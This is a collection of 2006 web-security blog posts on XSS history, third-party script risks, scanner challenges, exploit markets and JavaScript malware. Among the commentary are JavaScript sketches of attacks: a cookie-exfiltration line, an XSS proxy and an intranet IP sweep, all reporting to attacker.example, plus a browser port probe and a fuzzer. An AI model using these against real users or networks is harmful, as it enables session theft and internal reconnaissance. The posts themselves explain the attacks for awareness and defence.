Sunday, July 30, 2006

The origins of Cross-Site Scripting (XSS)

I've been active within the web application security world for many years now. Well before it was called "web application security", back when we called it "CGI security". Remember, a web application was originally called a CGI (common gateway interface). Anyway, in the mid-90's, when I was still a teenager, the Web was just starting to take off. These were the days of old Netscape, Yahoo, the blink tag, when every page was "under construction" with the same little yellow street sign. Before Microsoft even acknowledged the Internet. All the cool web pages used frames. One for the menu and another for the main content body, and some had a dozen of them just because they could. Then JavaScript hit the scene and became all the rage.

JavaScript enabled web developers to do all sorts of crazy things like image rollovers, mouse followers, and pop-up windows. Sure, it wasn't the slick AJAX stuff of today, but neat enough at the time. What was soon discovered was that a malicious website could load another website into an adjacent frame or window, then use JavaScript to read into it. One website could cross a boundary and script into another page: pull data from forms, re-write the page, etc. Hence the name cross-site scripting (CSS). Notice the use of "CSS". Netscape fired back with the "same-origin policy", designed to prevent such behavior. And the browser hackers took this as a challenge and began finding what seemed like hundreds of ways to circumvent that security.
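For flavor, here is a minimal sketch (with a hypothetical target URL) of the kind of cross-frame read that gave the technique its name, and that the same-origin policy now blocks in any modern browser:

  // Hypothetical illustration: load another site into a frame and try to read it.
  var frame = document.createElement("iframe");
  frame.src = "http://victim.example/login";   // hypothetical target site
  document.body.appendChild(frame);

  frame.onload = function () {
    try {
      // This read only works if the framed page shares our origin.
      var stolen = frame.contentWindow.document.body.innerHTML;
      console.log("read across the boundary: " + stolen.length + " bytes");
    } catch (e) {
      console.log("blocked by the same-origin policy: " + e.message);
    }
  };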

As more people became familiar with CSS, the term got confused with Cascading Style Sheets, another newly born web browser technology of the 90's. Then a couple of years ago, via the webappsec mailing list, someone suggested changing cross-site scripting to XSS to avoid the confusion. And just like that it stuck. XSS had an identity, and dozens of newly minted white papers and thousands of advisories were released. Over time the original meaning of XSS changed, from reading across domains to anytime you can get a website to display user-supplied content laced with HTML/JavaScript. That's why so many people are still confused by the name cross-site scripting: it really doesn't describe what it's become.

Such is the nature of things.

In a few short days we're going into the next evolutionary step. Hacking intranets with JavaScript Malware.

JavaScript Malware Slashdotted

Posted here. Hopefully the WhiteHat web server will be able to handle the load.

Wednesday, July 26, 2006

Where the next BIG attacks will come from

This morning I caught a post on webkitchen describing an idea for implementing safe cross-domain XHR using an opt-in method (by the destination server). A neat idea that I'll have to give more thought to. Clearly web developers need this kind of functionality to create ever better web apps. What caught my attention was near the bottom of the post:

"Clientside cross-domain data requests are an extremely useful tool. They can only currently be done (in Javascript) using the script-tag workaround to deliver data as JSON.

External JSON is extremely dangerous as it is arbitrary third-party code executed in the scope of the current web-page. It can be used to steal passwords or data present in the current scope. "
The author has it right: calling in external JSON is extremely dangerous. However, this explanation doesn't go far enough. Anytime you include JavaScript on your web page from a third party it carries the same risk. After all, it's possible for the data feed to contain JavaScript malware capable of doing many nasty things to your visitors (including stealing passwords). Also included in the risk profile are JS traffic counters, advertising banners, RSS feeds, weather displays, clocks, etc. etc. You know, web page widgets.
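To make the point concrete, here is a minimal sketch (URLs are hypothetical) of the script-tag include the quoted post refers to. Whatever the remote feed returns executes with the including page's full privileges:

  // The script-tag workaround for cross-domain data: the remote feed comes in
  // as executable code, not inert data.
  var s = document.createElement("script");
  s.src = "http://feeds.example/latest.js";   // hypothetical third-party widget or JSON feed
  document.body.appendChild(s);

  // If that feed is ever compromised (or simply malicious), it could just as
  // easily return something like the line below instead of a harmless callback,
  // and the including page has no way to tell the difference before it runs:
  //
  //   new Image().src = "http://attacker.example/steal?c=" +
  //                     encodeURIComponent(document.cookie);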

I alluded to this eventuality in my white paper on Cross-Site Scripting Worms and Viruses. In my opinion this is the likely attack vector for the next BIG attacks on the Web.

Tuesday, July 25, 2006

What WAS true, is no longer

Ryan Barnett brought something really interesting to my attention about O'Reilly's JavaScript: The Definitive Guide as it relates to my Black Hat talk about JavaScript Malware. Remember, my demos will not use any of what we would call "vulnerabilities" or "exploits" (No Bofos), just the clever use of native JavaScript.

In section 20.1, we find the following text:
"For example, client-side JavaScript does not provide any way to read, write, create, delete, or list files or directories on the client computer. Since there is no File object, and no file access functions, a JavaScript program obviously cannot delete a user's data, or plant viruses on the user's system, for example."
Without resorting to exploits, this remains more or less true, but it has become something of a red herring. Much of our confidential information (credit cards, tax/medical records, email, bank info, etc.) now lives on a website somewhere. What difference does it really make if you can't access files on my OS? The valuable data is on a public web server where JavaScript CAN access it.
"Similarly, client-side JavaScript has no networking primitives of any type. A JavaScript program can load URLs and send HTML form data to web servers and CGI scripts, but it cannot establish a direct connection to any other hosts on the network. "
WRONG. JavaScript can easily force a web browser to establish HTTP/HTTPS connections to any host the client can reach. Non-HTTP/HTTPS connections are a bit trickier and browser dependent, but well within the realm of possibility; in fact, someone has already demonstrated a method to do just that without using JavaScript at all. Mozilla/Firefox today has certain protections against connections to, say, port 22, but those can be circumvented as well. That topic is for another time.
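As a rough illustration of the HTTP/HTTPS case, here is a sketch (the address is an example only, and real-world versions need far more careful timing) of script forcing the browser to connect to an arbitrary host and inferring from the result whether anything answered:

  // Force the browser to connect to an arbitrary host and guess whether a web
  // server answered. An error or load firing before the timeout usually means
  // something responded on port 80; it just wasn't a valid image.
  function probe(host, timeoutMs, callback) {
    var img = new Image();
    var finished = false;
    function finish(status) {
      if (finished) return;
      finished = true;
      callback(host, status);
    }
    img.onerror = img.onload = function () { finish("answered"); };
    setTimeout(function () { finish("no response"); }, timeoutMs);
    img.src = "http://" + host + "/";
  }

  probe("192.168.1.1", 3000, function (host, status) {
    console.log(host + ": " + status);
  });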
"This means, for example, that a JavaScript program cannot use a client's machine as a attack platform from which to attempt to crack passwords on other machines. (This would be a particularly dangerous possibility if the JavaScript program has been loaded from the Internet, through a firewall, and then could attempt to break into the intranet protected by the firewall.)"
Again, no longer true, if it ever was. Last year in my Phishing with Superbait talk I demonstrated how JavaScript malware could completely control the web browser and be used as an attack platform. What's new this year is that I'll be demonstrating precisely how this can be done internally, through the firewall.
"But other information should not be public. This includes your email address, for example, which should not be released unless you choose to do so by sending an email message or authorizing an automated email message to be sent under your name."
Sorta still true. If you use a non-web-based email account, then your email address is harder to get, but not exactly impossible to find. If you are using web mail, like most of us, then your email address is accessible.
"Similarly, your browsing history (what sites you've already visited) and the contents of your bookmarks list should remain private. Because your browsing history and bookmarks say a lot about your interests, this is information that direct marketers and others would pay good money for, so that they can more effectively target sales pitches to you."
Your bookmarks are safe (without an exploit); your browsing history, not so much.
"We don't want a JavaScript program to be able to start examining data behind our corporate firewall or to upload our passwords file to its web server, for example."
What we want is one thing, what's possible is quite another.

Forging HTTP request headers with Flash

Amit Klein, a top webappsec expert, published "Forging HTTP request headers with Flash". Essentially Amit found a way, using Flash, to force a user's browser to send HTTP requests to any location and alter the Referer header in the process. This discovery has wide-ranging implications for web application security, not the least of which is the impact on the ability to do anti-CSRF using Referers. In an odd coincidence, I was working on a solution to do easy anti-CSRF with ModSecurity (which Amit had prior knowledge of) based on checking Referers. It was set to be released through WASC. I know what you're thinking: "don't ever ever ever trust the client". But I felt there could be an exception in this case and had the proof to back it up. Amit, being the nice guy that he is, let me know what he was working on ahead of time. So the article I had planned is being mothballed. Every week it's something new.

Anticipation growing leading up to Black Hat

Black Hat is almost upon us and the media engines are in gear, letting everyone know what the hot topics are for the conference. And there is A LOT this year. darkREADING just published an interview with yours truly, JavaScript Malware Targets Intranets, describing what I have in store for the audience. I can't wait! Without a doubt web application security is going to be a huge part of the show. Hat tip again to RSnake for all the help with the technical concepts and promotion of the event. Odd how some of us have fun: "hey, I wonder if we can port scan using JavaScript?" And here we are a couple of months later.

Monday, July 24, 2006

Another way to force-spoof browser referers.

As a WhiteHat employee once said, "If JavaScript can't do it, ask daddy Flash". Amit Klein did a great job discovering and documenting a way to use Flash to force a user's browser to make arbitrary HTTP Requests to any location and spoof client-side headers (including Referer and Expect). This has many web application security implications which we'll need to discuss in the coming weeks.

"Forging HTTP request headers with Flash"

Bye Bye CSRF solution.

How is fuzzing like AI?

Hackers use AI to uncover vulnerabilities
"Researchers at Secure Computing said that cyber-criminals are exploiting the ability of AI tools to use a methodology referred to as 'fuzzing' to test applications for bugs."

Ok, I'm no Artificial Intelligence (AI) pro, but I believe I understand the fundamentals. I am, however, very familiar with software "fuzzing". Heck, any competent black-box hacker is. You toss in some junk, and if the output looks something like a vulnerability, you have something to take a closer look at. Indeed, there has been some cool research using fuzzing in the web browser space recently.
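For the curious, here is a toy sketch of that black-box idea, using a placeholder URL, modern fetch for brevity, and a crude "does the junk get reflected back unencoded" check. Obviously, only point something like this at systems you are authorized to test. Nothing in it resembles intelligence, artificial or otherwise.

  // Toy black-box fuzzer: mutate one parameter with junk and flag responses
  // that echo the junk back verbatim (a crude reflected-XSS indicator).
  var probes = ['"><script>1</script>', "'--", "%00", "A".repeat(5000)];

  async function fuzz(baseUrl, param) {
    for (const probe of probes) {
      const url = baseUrl + "?" + param + "=" + encodeURIComponent(probe);
      const body = await (await fetch(url)).text();
      if (body.indexOf(probe) !== -1) {
        console.log("worth a closer look: " + url);
      }
    }
  }

  fuzz("http://test.example/search", "q");   // placeholder target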

What I fail to understand is how fuzzing is anything like AI. Probably just the marketing teams spinning up PR-worthy headlines. It's not like that doesn't happen every day anyway.

Tuesday, July 18, 2006

5 challenges of web application scanning

Web application security is a hot topic these days. Yet a comparatively limited amount of research has been performed in a field that remains wide open for creative minds. All you need to do is pick a topic and you are sure to uncover new stuff.

The work we do at WhiteHat Security enables us to push the limits of automated web application vulnerability scanning. It's vital to understand precisely what can and can't be scanned for, so an expert can complete the rest. Many still believe scanning web applications is anywhere close to the capabilities of our network scanning cousins; the difference in comprehensiveness and methodology is night and day. The validity of my estimates has been questioned by other webappsec scanner vendors, but my educated guess (based on thousands of assessments) remains that only about half of the required tests for a security assessment can be performed on a purely automated basis. The other half requires human involvement, typically for identifying vulnerabilities in business logic.

This is the area where we focus on improving the most. We know it's impossible to scan for everything (undecidable problems), so why not instead focus on the areas that reduce the human time necessary to complete a thorough assessment? To us this makes the most sense from a solution standpoint. We measure, on a check-by-check basis, which tests are working or not. What's taking us the most time and what can we do to speed things up? This strategy affords us the unique and agile ability to improve our assessment process faster than anyone else. We bridge the gap between our operations team (the guys who do the work) and the development team (who make the technology). The results are more complete, repeatable, and inexpensive security assessments.

For the technologists, the interesting bits are the challenges of automated web application scanning. I'll describe a few.

False-Positives and Vulnerability Duplicates
Anyone who has ever run a vulnerability scanner of any type understands the problem of false-positives. They are a huge waste of time. In the webappsec world, we have that plus the problem of vulnerability duplicates. It's often very difficult to tell whether 1,000 scanner-reported XSS vulnerabilities are in fact the same issue. Vulnerable parameters may be shared across different CGI's. URL's may contain dynamic content. Results can be hard to collapse down effectively, and if you can't, you're lost in a pile of script tags and single quotes.
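A minimal sketch of one way to collapse duplicates, assuming each finding carries a type, URL, and parameter (the field names are mine for illustration, not any particular scanner's):

  // Collapse raw findings into unique issues keyed on (class, script path,
  // parameter), ignoring the volatile parts of the URL.
  function dedupe(findings) {
    var unique = {};
    findings.forEach(function (f) {
      var path = new URL(f.url).pathname;          // drop query string and host noise
      var key = [f.type, path, f.parameter].join("|");
      if (!unique[key]) unique[key] = f;
    });
    return Object.values(unique);
  }

  var raw = [
    { type: "xss", url: "http://site.example/search.cgi?q=1&sid=abc", parameter: "q" },
    { type: "xss", url: "http://site.example/search.cgi?q=2&sid=def", parameter: "q" }
  ];
  console.log(dedupe(raw).length);   // 1: the two reports are the same issue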

404-Detection
It's common scanner practice to make guesses at files that might be left on the web server but just not linked in, like login.cgi.bak, register.asp.old, or /admin/. You would think it's the easiest thing in the world to tell if a file is there or not, right!? Web servers are supposed to respond with code 404 (per the RFC), aren't they!? Sure they do, er, sometimes anyway. Sometimes there are web server handlers that respond with 200 OK no matter what, making you think something is there when it isn't. They might even give you content they think you want, but not what you asked for. How do you tell? Sometimes the web server and the servlets inside have different 404 handlers. Some 404, while others 200, making it difficult to identify what exactly the web server is configured to do and when. Then there's dealing with dynamic not-found page content and multiple stages of redirects. The list of strangeness is endless. Unaccounted-for strangeness causes false-positives.
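One common trick, sketched below with a deliberately crude word-overlap measure, is to fetch a path that almost certainly does not exist, fingerprint that response, and treat later "200 OK" pages that look just like it as disguised not-found pages:

  // Similarity of two response bodies as the ratio of shared words.
  function similarity(a, b) {
    var wordsA = new Set(a.toLowerCase().split(/\s+/));
    var wordsB = new Set(b.toLowerCase().split(/\s+/));
    var shared = 0;
    wordsA.forEach(function (w) { if (wordsB.has(w)) shared++; });
    return shared / Math.max(wordsA.size, wordsB.size, 1);
  }

  // baselineBody: the body returned for /definitely-not-here-8f3a2c.bak
  // candidateBody: the 200 OK body returned for /login.cgi.bak
  function looksLikeSoft404(baselineBody, candidateBody) {
    return similarity(baselineBody, candidateBody) > 0.9;
  }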

Login and Authentication Detection
Again, another thing you would think should be simple. We made the same assumption in the early years and got a rude awakening. All you have to do is plug in a username and password, get a cookie, and scan away, right? If only it were that simple. Web sites log in using so many different methods. Some POST, some GET. Others rely on JavaScript (or broken JS), Java applets, a specific web browser because they check the DOM, multiple layers of cookies and redirects, virtual keyboards. The list of combinations is endless. And finding a way to support all these forms of technology is just half the story. The other half is trying to determine whether or not the scanner is still logged in. Any number of activities could cause the session to be invalidated: the crawler hits the logout link, session timeouts, IDS systems purposely causing logout on attack detection. The big thing is that if the scanner cannot maintain login state, the scans are invalid, end of story. Well, almost: you get to deal with false-positives next.
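One heuristic, sketched here with placeholder marker strings that would be site-specific in practice, is to record "logged-in markers" right after authenticating and re-check every response for them during the scan:

  // Decide whether the scanner is still authenticated by checking each
  // response for markers recorded right after login.
  var loggedInMarkers = ["logout", "my account"];
  var loggedOutMarkers = ["please sign in", 'name="password"'];

  function stillLoggedIn(responseBody) {
    var body = responseBody.toLowerCase();
    if (loggedOutMarkers.some(function (m) { return body.indexOf(m) !== -1; })) return false;
    return loggedInMarkers.some(function (m) { return body.indexOf(m) !== -1; });
  }

  // A scanner would call this on every response and re-authenticate (or halt)
  // the moment it returns false, since results gathered while logged out are invalid.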

Infinite web sites
We like to refer to this issue as the "calendar problem", as that was where we initially ran into it the most. By the way, we found the year 10,000 problem first, we think. :) When crawling web sites, sometimes there are just too many web pages (millions of items), the site grows and decays too rapidly, or unique links are generated on-the-fly. A good percentage of the time, while we can technically reach heights of million-plus link scans, it's simply impossible or impractical to crawl the entire website. A scanner could trap itself by going down an infinite branch of a website. A scanner needs to be smart enough to realize it's in this trap and dig itself out. Otherwise you get an infinite scan.
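A minimal sketch of one way a crawler can notice it has wandered into an infinite branch: collapse URLs into a coarse pattern and cap how many pages matching the same pattern it will fetch (the cap value here is arbitrary):

  var PATTERN_LIMIT = 200;      // arbitrary cap per URL pattern
  var seenPatterns = {};

  function urlPattern(url) {
    var u = new URL(url);
    // Replace digit runs so /calendar/2006/07/30 and /calendar/2006/07/31
    // collapse into the same pattern.
    var path = u.pathname.replace(/\d+/g, "N");
    var params = Array.from(u.searchParams.keys()).sort().join(",");
    return u.hostname + path + "?" + params;
  }

  function shouldCrawl(url) {
    var key = urlPattern(url);
    seenPatterns[key] = (seenPatterns[key] || 0) + 1;
    return seenPatterns[key] <= PATTERN_LIMIT;
  }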

Finding all pages and functionality
This is a similar problem to the infinite web site issue. To test a website for vulnerabilities, you have to find as many of its applications and functional parts as possible. The problem is you can never be sure you found all the functionality or figured out all the ways to exercise its moving parts. In fact, some functional URL's may never be linked into the main website and are only exposed through email. Then there's always the possibility that certain functionality is buried several form layers deep, accessible only by specific users, or hidden behind/inside JavaScript/applets/Flash/ActiveX. Sometimes the only way to find this stuff is manually, and even then you're guessing you found it all.

So there you have it. An overview of a handful of the challenges we push the limits on every day. I wish I could go into the innovative solutions we develop and improve behind the scenes. The bottom line of what you need to know is that scanning web applications is an imperfect art. And if you take a list of "we support this" features from any scanner, you'll find the actual "support" will vary from one website to the next. That's why scanning combined with an assessment process is the only way to go, and is greater than the sum of its parts.

the devil made me do it

I was just reading RSnake's post on Attacking Applications Via XSS Proxies. We've toyed around with different XSS exploitation ideas for a long while, but having seen it written out, it's spooky. Essentially RSnake describes how someone could hack a website through an XSS'ed victim, with the bonus that the attacker's IP never shows up in the target machine's logs. The explanation is a bit complicated (the XSS proxy attack diagram makes it easier), but once it clicks you'll see how plausible and easy the idea becomes.
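My rough reading of the idea, boiled down to a sketch (all URLs are hypothetical, and RSnake's post is the real reference): script injected into the vulnerable site polls the attacker for instructions, performs same-origin requests on the victim's behalf, and leaks the results back, so only the victim's IP appears in the target's logs.

  // Smuggle a result out to the attacker via an image request.
  function leak(data) {
    new Image().src = "http://attacker.example/collect?d=" +
                      encodeURIComponent(data.slice(0, 1500));
  }

  // Fetch a same-origin path on the attacker's behalf and leak the response.
  function runCommand(path) {
    var xhr = new XMLHttpRequest();
    xhr.open("GET", path, true);     // same-origin, so the browser allows it
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4) leak(path + "|" + xhr.responseText);
    };
    xhr.send(null);
  }

  // The attacker's server would return something like: runCommand("/account/settings");
  setInterval(function () {
    var s = document.createElement("script");
    s.src = "http://attacker.example/next-command.js";   // poll for instructions
    document.body.appendChild(s);
  }, 5000);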

Another side effect of the research applies to cyber crime (hacking) cases. I've read that courts have found reasonable doubt for the accused where the argument is that a trojan horse on their machine did the hacking, not them. The forensic investigators certainly can't rule out the possibility, because hey, the machine did have a trojan and could have done exactly that. The thing is, XSS malware is able to act similarly to a typical trojan horse; the main difference is that the code resides in the web browser and isn't present on the filesystem or in memory.

What if a person wanted to frame someone using an XSS attack? For instance, making their victim hack another website (a la RSnake), DoS some government websites, or access some pedophilia. Every log in the world would say the victim did exactly that, and it leaves very little if any forensic evidence. The trojan defense goes out the door, for the innocent and the guilty, especially since I doubt forensic investigators are looking for XSS malware to begin with.

Thursday, July 13, 2006

bugs will always be with us

I came across this Google blog post after my last entry. It describes how a bug in a binary search program, in Programming Pearls, escaped detection for twenty years! Check this out:
"And now we know the binary search is bug-free, right? Well, we strongly suspect so, but we don't know. It is not sufficient merely to prove a program correct; you have to test it too. Moreover, to be really certain that a program is correct, you have to test it for all possible input values, but this is seldom feasible. With concurrent programs, it's even worse: You have to test for all internal states, which is, for all practical purposes, impossible."
This is exactly the reason why we have so many problems comprehensively scanning complex web applications, where the discrete software components exist on many different servers. The state is always changing. The code is always changing. Everything is always changing.

"Careful design is great. Testing is great. Formal methods are great. Code reviews are great. Static analysis is great. But none of these things alone are sufficient to eliminate bugs: They will always be with us. A bug can exist for half a century despite our best efforts to exterminate it."

This is another reason why I've been a heavy proponent (as a practitioner and a vendor) of pen-testing websites like a hacker would. Because a hacker only needs to find that one bug to ruin your day, you have to test even more thoroughly and intensely. The focus must be to find all vulnerabilities all the time; it's the only way to make a difference.




Tuesday, July 11, 2006

Securing 88,166,395 sites

According to Netcraft's July 2006 Web Server Survey there are 88,166,395 sites, an increase of 2.87 million from the month of June. That’s an astounding 95,000 new sites per day! I’ve frequently discussed that roughly 8 in 10 websites have serious vulnerabilities. Talk about a hacker paradise. Scammers, phishers, carders, blackhats (not the conference), or let's just call them criminals, know this well. They are reaping the rewards at our expense. With the help of disclosure laws, it's no wonder reports break every day about new website hacks. We know all this stuff already, but what can we do about it?

What are we going to do about the security of nearly 90 million websites?

Some say, "security in the Software Development Life-Cycle (SDLC) will save us." A development process of creating solid code from the beginning. It has the benefit of producing quality code and that has less bugs. Less bugs = more secure. More secure = harder to hack. Harder to hack = good. No argument there. Though we have to be pragmatic. Planning to be bug-free and requiring developers to write 100% secure code is not a reasonable request. It doesn't mean they don't want to, its because its REALLY REALLY hard, maybe impossible. Furthermore, proving if code is bug-free (secure) is impossible. This is one of those undecidable halting problems.

Remember, we’ve been dealing with buffer overflows for 20 years (maybe more). Will it be any different for Cross-Site Scripting? I don't think so. Let's face it, no matter how hard we try, software will always have bugs and therefore security vulnerabilities. To say nothing of the fact that we'll NEVER go back and recode all 88,166,395 websites. That’s just a plain silly assertion people make. What we really need to know is WHERE and HOW our existing websites are vulnerable, and we also need to stay on top of the daily code updates. Then we can make intelligent decisions and measure our success.

Secure code is one thing we can do; another is implementing a strategy of defense-in-depth, one in which Web Application Firewalls (WAF's) play a part. I routinely recommend ModSecurity for anyone using Apache (it’s on every one of my installs). WAF’s have the benefit of protecting web applications that may or may not be vulnerable to something. Sure, they are not perfect and have negative side effects, but when implemented properly they provide that extra protection that could very well keep you out of the headlines.

In any event, I’ll continue recommending web application security assessments; otherwise how do you know whether your website is secure or not? It could be that some web hacker does it for you by alerting the media.

My Black Hat USA 2006 Presentation

It's been posted everywhere except here that I'll be presenting at this year's Black Hat USA 2006. The show is only a few short weeks away and I'm really excited about it. The sheer volume of web application security talks is nothing short of amazing, and I think I’ll just camp out in the Palace Ballroom 1 (Web Security Track) on Day 2.

Anyone who has ever responded to a Black Hat CFP knows how difficult it is to get in, because you are literally competing with the top infosec experts in the world. This is why people attend Black Hat and what they expect to see. Even after nearly a dozen appearances, it's still very much an honor to be accepted. My topic this year, Hacking Intranet Websites from the Outside - "JavaScript malware just got a lot more dangerous", will be particularly special and well beyond anything previously demonstrated.

That’s right, JavaScript Malware.

When you visit a web page, JavaScript malware grabs your web browser’s cookies/history, discovers your internal NAT'ed IP address, port scans behind the firewall, and exploits intranet web-enabled devices from the inside. Of course the PoC code also acts like a trojan horse by recording keystrokes and tracking your every move. No browser exploits required. If this isn’t malware I don’t know what is. And if that weren't enough, I’ll be describing how websites that are vulnerable to Cross-Site Scripting (the most common vulnerability) are open to hosting and publishing JavaScript malware to their visitors.
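The talk itself is where the real techniques live; purely as a toy illustration of the intranet-probing idea, here is a sketch that sweeps a handful of common internal gateway addresses from inside a victim's browser and reports anything that answers (addresses and report URL are examples only):

  var candidates = ["192.168.0.1", "192.168.1.1", "10.0.0.1", "172.16.0.1"];

  candidates.forEach(function (ip) {
    var img = new Image();
    var timer = setTimeout(function () { img.onerror = img.onload = null; }, 4000);
    img.onerror = img.onload = function () {
      // A quick error or load means a web server (likely a router or printer
      // admin page) answered on the internal address.
      clearTimeout(timer);
      new Image().src = "http://attacker.example/found?ip=" + ip;   // hypothetical collection point
    };
    img.src = "http://" + ip + "/";
  });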

If you are at the show, WASC is having another meet-up:

“Whenever there are lots of webappsec presentations and people in the same place, it's a good opportunity for members of the community to meet-up. As we did last year, tucked in between the first day talks and before the vendor parties, we gather to share drinks, war stories, gossip, techno babble, and some laughs. With the amount web application security stuff going on at the conference, our 4th WASC meet-up should be the biggest ever!”

Time: Wed, August 2 @ 6:15pm

Place: Shadow bar at Caesars
http://www.caesars.com/Caesars/LasVegas/Dining/BarsLounges/ShadowBar.htm

recommended reading

Over the last year I've been fortunate enough to assist several authors with some brand-new and really good information security books. I was asked to write the foreword for two of them and also got a nice quote on the cover of another. These books are stellar, and if you’re looking to learn the latest tricks of the trade, especially in web application security, they are definitely worth picking up.



Hacker's Challenge 3
by David Pollino, Bill Pennington, Tony Bradley, Himanshu Dwivedi



Hacking Exposed Web Applications, Second Edition
by Joel Scambray, Mike Shema, Caleb Sima



Preventing Web Attacks with Apache
by Ryan C. Barnett



Apache Security
by Ivan Ristic

Monday, July 10, 2006

buying and selling exploits

RSnake's post on Google's recent XSS woes spurred some interesting thoughts about the market value of, and marketplace for, 0-day vulnerabilities. The premise being that if a "good guy" discovers a vulnerability, they are expected by the vendor and the community to disclose it responsibly so it may or may not be fixed. In return the good guy can expect some credit for their work. The issue is that finding these vulnerabilities takes "work" and "expertise". Sure, some more than others. The good guy also runs the risk of angering people, which RSnake encountered, making the process of disclosure something not worth repeating.

The important part to understand is that certain vulnerabilities have significant value to the black hat element. I'd expect bad guys finding and buying 0-days is a lot more common than we'd like to believe. They have no problem monetizing the information through exploitation, extortion, or whatever else they can think of. So the question RSnake raised about developing a marketplace for vulnerabilities (an auction) is something worth considering: a marketplace where the good guy and the vendor get what they want and the user is better protected. Nice.

I knew I'd come across this line of thinking before so I had to do some research. Ironically using Google.

I did recall that Mozilla had a Bug Bounty program and LiveJournal had the XSS security challenge. These initiatives seemed to be at least somewhat successful. Also, ironically, I discovered that at the end of 2005, "eBay pulls vulnerability auction": the auction was offering up an MS Excel vulnerability "which could allow a malicious programmer to create an Excel file that could take control of a Windows computer when opened," with eBay saying that "the sale of flaw research violates the site's policy against encouraging illegal activity." Fair enough. Well-recognized bug-finder Greg Hoglund also toyed with the 0-day marketplace idea: "Turning to auctions to maximize a security researcher's profits and fairly value security research is also not a new idea. Two years ago, security expert Greg Hoglund had reserved the domain "zerobay.com" and intended to create an auction site, but worries over liability caused him to scuttle the plan a few days before the site went live, he said."

Picking up from there more recently, there have been a couple of companies, including 3Com's TippingPoint, that purchase vulnerabilities through their Zero Day Initiative program. Though I'm not familiar with their current stance on live web application vulnerabilities. So developing a marketplace for vulnerabilities is not exactly unheard of, but I do think there is a gaping hole when it comes to custom web applications.

As I've said on many occasions before, in webappsec the issue is NOT disclosure, it's discovery:

"Web application security" vulnerabilities are completely different issue because they exist on someone else's server. The infosec community hasn't dealt with the legal issues of "discovering" vulnerabilities, only with "disclosing" them. Researchers have played the role of good samaritan by finding vulnerabilities in software thats important. So far, the software has run on our PC's. However we're moving into a world where the important software is custom web applications and not installable elsewhere. The same people whom provided the layer of security checking can no longer do so in a safe legal fashion. To those who say "do not test a system without written consent", offer good but short-sighted advice. Organizations providing the web-based services are not going to be handing out "hack me if can" authorization letters.

Perhaps Google, Yahoo, Microsoft, or some other big web service operator could openly compensate the people who find vulnerabilities in their custom web applications and save everyone, including themselves, some headache. If LiveJournal can do it, hey, maybe they can too.